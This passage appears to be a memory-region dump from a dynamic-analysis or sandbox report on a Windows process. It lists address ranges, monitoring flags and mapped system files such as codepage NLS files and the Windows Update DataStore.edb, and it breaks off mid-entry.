region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 2607 start_va = 0x1a40000 end_va = 0x1acdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2608 start_va = 0x1ad0000 end_va = 0x1ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 2609 start_va = 0x1af0000 end_va = 0x1b00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 2610 start_va = 0x1b10000 end_va = 0x1b37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 2611 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2612 start_va = 0x1c40000 end_va = 0x1cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2613 start_va = 0x1cc0000 end_va = 0x1cf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 2614 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2615 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2616 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2617 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2618 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2619 start_va = 0x2200000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2620 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 2621 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2622 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2623 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2624 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2625 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2626 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2627 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2628 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2629 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2630 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2631 start_va = 0x2c80000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 2632 start_va = 0x2d80000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2633 start_va = 0x2e80000 end_va = 0x2f5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2634 start_va = 0x2f60000 end_va = 0x2f70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 2635 start_va = 0x2f80000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 2636 start_va = 0x3000000 end_va = 0x307ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2637 start_va = 0x3080000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 2638 start_va = 0x3180000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2639 start_va = 0x3280000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2640 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2641 start_va = 0x3380000 end_va = 0x3386fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 2642 start_va = 0x3390000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 2643 start_va = 0x3490000 end_va = 0x350ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 2644 start_va = 0x3510000 end_va = 0x358ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 2645 start_va = 0x3590000 end_va = 0x3596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 2646 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 2647 start_va = 0x3620000 end_va = 0x371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2648 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 2649 start_va = 0x37a0000 end_va = 0x381ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 2650 start_va = 0x3820000 end_va = 0x389ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 2651 start_va = 0x38a0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 2652 start_va = 0x3920000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 2653 start_va = 0x3a20000 end_va = 0x3a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 2654 start_va = 0x3aa0000 end_va = 0x3ab0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 2655 start_va = 0x3ac0000 end_va = 0x3af0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 2656 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 2657 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 2658 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2659 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 2660 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2661 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 2662 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 2663 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2664 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2665 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2666 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2667 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2668 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2669 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2670 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 2671 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 2672 start_va = 0x4b00000 end_va = 0x4b30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 2673 start_va = 0x4b40000 end_va = 0x4b40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 2674 start_va = 0x4b50000 end_va = 0x4b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b50000" filename = "" Region: id = 2675 start_va = 0x4b60000 end_va = 0x4b61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 2676 start_va = 0x4b70000 end_va = 0x4b76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 2677 start_va = 0x4b80000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 2678 start_va = 0x4c80000 end_va = 0x4c86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 2679 start_va = 0x4c90000 end_va = 0x4cd2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 2680 start_va = 0x4ce0000 end_va = 0x4ce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 2681 start_va = 0x4cf0000 end_va = 0x4cf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cf0000" filename = "" Region: id = 2682 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2683 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 2684 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 2685 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 2686 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 2687 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2688 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2689 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 2690 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 2691 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 2692 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 2693 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2694 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 2695 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 2696 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 2697 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 2698 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 2699 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 2700 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 2701 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 2702 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 2703 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 2704 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 2705 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 2706 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 2707 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 2708 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 2709 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 2710 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 2711 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 2712 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 2713 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 2714 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 2715 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 2716 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 2717 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 2718 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 2719 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 2720 start_va = 0x7300000 end_va = 0x737ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 2721 start_va = 0x7380000 end_va = 0x747ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007380000" filename = "" Region: id = 2722 start_va = 0x7480000 end_va = 0x7481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007480000" filename = "" Region: id = 2723 start_va = 0x7520000 end_va = 0x759ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007520000" filename = "" Region: id = 2724 start_va = 0x75a0000 end_va = 0x769ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075a0000" filename = "" Region: id = 2725 start_va = 0x76a0000 end_va = 0x76a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076a0000" filename = "" Region: id = 2726 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 2727 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 2728 start_va = 0x7900000 end_va = 0x797ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 2729 start_va = 0x7980000 end_va = 0x7983fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007980000" filename = "" Region: id = 2730 start_va = 0x7990000 end_va = 0x799ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007990000" filename = "" Region: id = 2731 start_va = 0x79a0000 end_va = 0x79a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 2732 start_va = 0x79b0000 end_va = 0x79fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000079b0000" filename = "" Region: id = 2733 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 2734 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 2735 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 2736 start_va = 0x7d00000 end_va = 0x7d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d00000" filename = "" Region: id = 2737 start_va = 0x7d10000 end_va = 0x7d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d10000" filename = "" Region: id = 2738 start_va = 0x7d20000 end_va = 0x7d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d20000" filename = "" Region: id = 2739 start_va = 0x7d30000 end_va = 0x7d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d30000" filename = "" Region: id = 2740 start_va = 0x7d40000 end_va = 0x7d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d40000" filename = "" Region: id = 2741 start_va = 0x7d50000 end_va = 0x7d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d50000" filename = "" Region: id = 2742 start_va = 0x7d60000 end_va = 0x7ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d60000" filename = "" Region: id = 2743 start_va = 0x7de0000 end_va = 0x7e2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007de0000" filename = "" Region: id = 2744 start_va = 0x7e30000 end_va = 0x7e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e30000" filename = "" Region: id = 2745 start_va = 0x7e40000 end_va = 0x7e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e40000" filename = "" Region: id = 2746 start_va = 0x7e50000 end_va = 0x7e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e50000" filename = "" Region: id = 2747 start_va = 0x7e60000 end_va = 0x7e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e60000" filename = "" Region: id = 2748 start_va = 0x7e70000 end_va = 0x7e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e70000" filename = "" Region: id = 2749 start_va = 0x7e80000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e80000" filename = "" Region: id = 2750 start_va = 0x7e90000 end_va = 0x8e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e90000" filename = "" Region: id = 2751 start_va = 0x8e90000 end_va = 0x8e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e90000" filename = "" Region: id = 2752 start_va = 0x8ea0000 end_va = 0x8ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ea0000" filename = "" Region: id = 2753 start_va = 0x8eb0000 end_va = 0x8eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008eb0000" filename = "" Region: id = 2754 start_va = 0x8ec0000 end_va = 0x8ec3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ec0000" filename = "" Region: id = 2755 start_va = 0x8ed0000 end_va = 0x8ed1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ed0000" filename = "" Region: id = 2756 start_va = 0x8ee0000 end_va = 0x8ee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ee0000" filename = "" Region: id = 2757 start_va = 0x8ef0000 end_va = 0x8f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ef0000" filename = "" Region: id = 2758 start_va = 0x8f10000 end_va = 0x8f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f10000" filename = "" Region: id = 2759 start_va = 0x8f20000 end_va = 0x8f23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f20000" filename = "" Region: id = 2760 start_va = 0x8f30000 end_va = 0x8f31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f30000" filename = "" Region: id = 2761 start_va = 0x8f40000 end_va = 0x8f4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2762 start_va = 0x8f50000 end_va = 0x8f5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2763 start_va = 0x8f60000 end_va = 0x8f6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2764 start_va = 0x8f70000 end_va = 0x8f7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2765 start_va = 0x8f80000 end_va = 0x8f8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2766 start_va = 0x8f90000 end_va = 0x8f9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2767 start_va = 0x8fa0000 end_va = 0x8faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2768 start_va = 0x8fb0000 end_va = 0x8fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2769 start_va = 0x8fc0000 end_va = 0x8fcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2770 start_va = 0x8fd0000 end_va = 0x8fdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2771 start_va = 0x8fe0000 end_va = 0x8feffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2772 start_va = 0x8ff0000 end_va = 0x8ffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2773 start_va = 0x9000000 end_va = 0x900ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2774 start_va = 0x9010000 end_va = 0x901ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2775 start_va = 0x9020000 end_va = 0x909ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009020000" filename = "" Region: id = 2776 start_va = 0x90a0000 end_va = 0x90affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090a0000" filename = "" Region: id = 2777 start_va = 0x90b0000 end_va = 0x90bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090b0000" filename = "" Region: id = 2778 start_va = 0x90c0000 end_va = 0x90c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090c0000" filename = "" Region: id = 2779 start_va = 0x90d0000 end_va = 0x90dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2780 start_va = 0x90e0000 end_va = 0x90effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090e0000" filename = "" Region: id = 2781 start_va = 0x90f0000 end_va = 0x90fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 2782 start_va = 0x9100000 end_va = 0x910ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009100000" filename = "" Region: id = 2783 start_va = 0x9110000 end_va = 0x911ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009110000" filename = "" Region: id = 2784 start_va = 0x9120000 end_va = 0x9120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename 